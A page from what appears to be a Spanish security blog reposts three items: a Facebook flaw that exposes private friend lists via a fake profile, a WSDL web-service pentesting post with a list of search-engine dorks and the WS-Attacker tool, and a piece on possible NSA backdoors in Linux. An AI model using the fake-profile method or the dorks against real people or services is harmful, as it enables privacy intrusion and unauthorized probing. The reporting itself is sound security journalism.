<div style="text-align: justify;"> Irene Abezgauz, un investigador de seguridad del Centro de investigación de Quotium ha encontrado una <a href="http://www.quotium.com/research/advisories/Facebook_Vulnerability_Discloses_Private_Friends_list.php" rel="nofollow" target="_blank">vulnerabilidad en Facebook que permite ver la lista de amigos de los usuarios</a>, aunque el usuario haya establecido esa información como privada.</div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> </div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisHHvEPZNW7_X4SNYnpQ-q9nCxW5gsaJm0ed3QLrkEZA0ekxL2OC_qXnoPnyCfwp8U7n_dvLptprfTCkAuEMvsJuk3-bh9Nrukj1tyfCCk8tpmWUruR085PHm2JrA0DIwqcaRNoxC56QkX/s1600/facebook-logo-hacked.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisHHvEPZNW7_X4SNYnpQ-q9nCxW5gsaJm0ed3QLrkEZA0ekxL2OC_qXnoPnyCfwp8U7n_dvLptprfTCkAuEMvsJuk3-bh9Nrukj1tyfCCk8tpmWUruR085PHm2JrA0DIwqcaRNoxC56QkX/s320/facebook-logo-hacked.jpg" width="320" /></a></div> <div style="text-align: justify;"> <br /> <br /> El exploit abusa de la función de "Personas que tal vez conozcas" en Facebook, que sugiere nuevos amigosen base a conexiones mutuas y otros criterios como la educación o el trabajo.</div> <br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5DoirajLItXEMVCohNvYKnCePIpx4xobuvFJkpExTjeoizKolRtxJNOZPFluVEW4vGGIXVIoJE2xd6vm-SppFVhQZZZTcWOOMvycUiGMrhZMaSumwr164AWktOWhwgW3L22Umso70RoU/s1600/Facebook+hack+reveals+private+friend+list+of+users.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5DoirajLItXEMVCohNvYKnCePIpx4xobuvFJkpExTjeoizKolRtxJNOZPFluVEW4vGGIXVIoJE2xd6vm-SppFVhQZZZTcWOOMvycUiGMrhZMaSumwr164AWktOWhwgW3L22Umso70RoU/s400/Facebook+hack+reveals+private+friend+list+of+users.png" style="display: inline;" /></a></div> <br /><div style="text-align: justify;"> ¡Este hack es muy sencillo! Lo que se tendría que hacer es crear un perfil falso de Facebook y luego enviar una solicitud de amistad a su objetivo. Incluso si el usuario objetivo nunca acepta la solicitud, el atacante puede ver la lista de amigos de esa persona a través de la función de "<i>gente que tal vez conozcas</i>".<br /><br /> Facebook dice que <i>"un atacante no tienen forma de saber si los amigos sugeridos representan o no la lista completa del usuario. Puede ver cientos de sugerencias y no saber cuales son los reales, sólo es un 80%"</i>.<br /> Por el momento, Facebook no ha reconocido el hallazgo. Entonces, ¿para qué establecer dicha lista como privada?</div> <br /> Fuente: <a href="http://thehackernews.com/2013/11/facebook-vulnerability-allows-to-view.html" rel="nofollow" target="_blank">HackerNews</a><div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"> <br /></div>

Irene Abezgauz, un investigador de seguridad del Centro de investigación de Quotium ha encontrado una vulnerabilidad en Facebook que permit...

Leer más »

Pentesting a servicos web: WSDL

<div style="text-align: justify;"> <a href="http://es.wikipedia.org/wiki/WSDL%E2%80%8E" rel="nofollow" target="_blank">"Web Services Description Language" (WSDL)</a> es un lenguaje empleado en páginas web para informar a los clientes que el servidor dispone de una aplicación indicándole en que consiste el servicio que ofrece, mostrando cual es su función y como puede un cliente interactuar con ella. Esto lo hace a través de un archivo XML en donde se describe todo lo anterior.<br /> <br /> WSDL esta pensado para facilitar la vida al administrador pudiendo añadir de manera amena nuevos servicios. La información que ofrece este archivo puede llegar a ser un tesoro. Con él se obtiene información sobre appwebs, su ubicación, como trabaja, puntos de entrada a la aplicación, posibles ataques de sql injection, ataques a paneles de autentificacion, ataques al parámetro SessionId, etc...<br /> <br /> Un ejemplo para entenderlo mejor: <a href="http://tinyurl.com/knpx95z" rel="nofollow" target="_blank" title="http://tinyurl.com/knpx95z">http://tinyurl.com/knpx95z</a><br /> Más información: <a href="http://di002.edv.uniovi.es/%7Efalvarez/WSDL.pdf" rel="nofollow" target="_blank" title=" http://di002.edv.uniovi.es/~falvarez/WSDL.pdf ">http://di002.edv.uniovi.es/~falvarez/WSDL.pdf</a><br /> <br /> Para encontrar ficheros WSDL basta con hacer un poco de hacking con buscadores:<br /> </div> <ul style="text-align: justify;"> <li>filetype:”wsdl”</li> <li>indexof:”/wsdl”</li> <li>inurl:wsdl</li> <li>inurl:”?wsdl”</li> <li>inurl:”.wsdl”</li> <li>inurl:”.aspx?wsdl”</li> <li>inurl:”.ascx?wsdl”</li> <li>inurl:”.asmx?wsdl”</li> <li>inurl:”.ashx?wsdl”</li> <li>inurl:”.jws?wsdl”</li> <li>inurl:”.svc?wsdl”</li> <li>filetype:wsdl wsdl</li> </ul> <div style="text-align: justify;"> Y las que se te vayan ocurriendo. Una de las herramientas para este fin que más me ha sorprendido es <a href="http://sourceforge.net/projects/ws-attacker/" rel="nofollow" target="_blank">WS-ATTACKER</a>, actualizada hace unos meses, incorpora una cantidad de plugins muy interesantes.</div> <div style="text-align: justify;">  </div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3XT9IXCe9dmm0IZHQ9b96x-Uiojv8dqkLDsTE10dL7O58n1RBYKDjOi6emaUJAEYqqb91S14ozaIqjN4uDiqhXT16RjgD6ZpGKUkbHGQRfbNovdDwwHrSz3VEcjexfDCGr5vQcgzzBMZD/s1600/menu3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3XT9IXCe9dmm0IZHQ9b96x-Uiojv8dqkLDsTE10dL7O58n1RBYKDjOi6emaUJAEYqqb91S14ozaIqjN4uDiqhXT16RjgD6ZpGKUkbHGQRfbNovdDwwHrSz3VEcjexfDCGr5vQcgzzBMZD/s320/menu3.jpg" width="320" /></a></div> <div style="text-align: justify;">  </div> <div style="text-align: justify;">  </div> <div style="text-align: justify;"> Basta con indicar la ruta de un wsdl, configurando los parámetros, seleccionar los plugins que convegan y comenzar a testear.<br /> <br /> Fuente: <a href="http://dominiohacker.com/pentesting-a-servicos-web-wsdl-1880/">Dominio Hacker</a><div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"> <br /></div>  </div> <div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"> <div style="text-align: justify;"> <br /></div> </div>

"Web Services Description Language" (WSDL) es un lenguaje empleado en páginas web para informar a los clientes que el servidor...

Leer más »

¿Podría haber un backdoor en un sistema operativo de código abierto?

<div style="text-align: justify;"> Que <a href="http://falkvinge.net/2013/11/17/nsa-asked-linus-torvalds-to-install-backdoors-into-gnulinux/" rel="nofollow" target="_blank">la NSA propuso a Linus Torvalds introducir una puerta trasera en Linux</a> era un rumor que el propio creador del kernel ya reconoció en septiembre durante la conferencia <a href="http://events.linuxfoundation.org/events/archive/2013/linuxcon-north-america" rel="nofollow" target="_blank">LinuxCon</a>. Ahora sin embargo ya es un hecho confirmado porque así se reveló durante la audiencia sobre la vigilancia de masas en el Parlamento Europeo de esta semana.<br /> <br /> Nils Torvalds, padre de Linus y miembro del Parlamento Europeo de Finlandia, comentaba (minuto 3:09:06 del <a href="http://youtu.be/EkpIddQ8m2s" rel="nofollow" target="_blank">vídeo</a>): "<i>Cuando a mi hijo mayor le hicieron la misma pregunta: '¿te ha hecho la NSA alguna propuesta sobre backdoors', dijo 'No' , pero al mismo tiempo él asintió. Era una clase de libertad legal. Le había dado la respuesta correcta, [pero] todos entendieron que la NSA se había acercado a él".</i></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3t132rCus2xMg6mPxU3rtamjCbzcb0jMXq8ygQco222Q2nFNgi0Gy9DTU5cw3boVBYKmCW5ONLc_E6MVgL1zEbv95IGj0_9aUxwjAmaRBRGhyphenhyphenZD5xT6Dl_9b48suVRyUwdWC13bW__cxI/s1600/Linux_Nsa.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3t132rCus2xMg6mPxU3rtamjCbzcb0jMXq8ygQco222Q2nFNgi0Gy9DTU5cw3boVBYKmCW5ONLc_E6MVgL1zEbv95IGj0_9aUxwjAmaRBRGhyphenhyphenZD5xT6Dl_9b48suVRyUwdWC13bW__cxI/s1600/Linux_Nsa.jpg" /></a></div> <div style="text-align: justify;"> <br /> La historia no nos dice todavía qué respondió Linus Torvalds a la NSA, pero supongo que les dijo que n<a href="http://libuntu.wordpress.com/2013/09/10/linus-torvalds-responde-que-el-kernel-linux-no-tiene-backdoors-de-la-nsa/" rel="nofollow" target="_blank">o sería capaz de inyectar puertas traseras</a>, aunque quisiera, ya que <b>el código fuente es abierto y todos los cambios son revisados por muchas personas independientes. </b>Después de todo, esa es una de las ventajas del código fuente abierto y la razón por la que, en teoría, se podría confiar cuando se trata de seguridad.<br /> <br /> Y digo en teoría porque en este mundo ya nadie se ríe y piensa que eres un paranoico si afirmas que, <b>aun así, también podrían haber introducido un backdoor en Linux,</b> aunque sea un sistema operativo de código abierto... <br /> <a href="http://www.blogger.com/null" name="more"></a><br /> Descargar e instalar un paquete firmado de un sitio oficial sólo te garantiza de dónde viene y que no ha sido modificado en tránsito. Pero, ¿se puede confiar en que realmente haya sido compilado sin haberse modificado ningún fichero del repositorio público o se hayan introducido cambios reconocidos pero con funcionalidades adicionales ocultas? <br /> <br /> Realmente la respuesta da un poco igual para la mayoría. Si lo piensas ¿quién descarga y compila el código de una distribución? Sólo algunos profesionales y entusiastas. Es más, aunque recompilen el código ¿cuantos lo han revisado? Seguramente no haya nadie o muy pocos que tengan la capacidad de analizar todos los componentes del sistema operativo. <br /> <br /> Supongamos que alguien decide analizar exhaustivamente el código para verificarlo. Si recordáis hace poco en el blog hablábamos de una <a href="http://www.hackplayers.com/2013/11/podria-truecrypt-esconder-un-backdoor.html" target="_blank">iniciativa de financiación colectiva sólo para auditar el código de Truecrypt</a>. Imaginaros el coste de auditar una distribución Linux cuyo código es más de 10 veces mayor.<br /> <br /> Pero vayamos un poco más allá. Pensemos por un momento que alguien asume la inversión y se lleva a cabo la revisión completa del código del sistema operativo. Lo lógico sería que la revisión se dividiera por partes ¿no sería factible controlar a una empresa o a algunos grupos de desarrolladores? Es más, ¿no sería posible ocultar un backdoor delante de sus narices?. Ya <a href="http://www.securityfocus.com/news/7388" target="_blank">en 2003</a> se cambiaron en el kernel dos líneas de código que parecían un error tipográfico pero que al llamar la función sys_wait4 daban acceso como root...<br /> <br /> Pensarlo por un momento. Yo amo a Linux porque ofrece más libertad y al menos te da la opción de revisar y modificar el código pero creo que sí sería posible introducir una puerta trasera en el sistema operativo, aunque sea de código abierto... ¿por qué si no la NSA se habría dirigido a Linus Torvalds?<br /> <br /> Fuente: <a href="http://www.hackplayers.com/2013/11/podria-haber-un-backdoor-en-un-so-de-codigo-abierto.html" rel="nofollow" target="_blank">Hackplayers</a></div> <div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"> <br /></div>

Que la NSA propuso a Linus Torvalds introducir una puerta trasera en Linux era un rumor que el propio creador del kernel ya reconoció en s...

Leer más »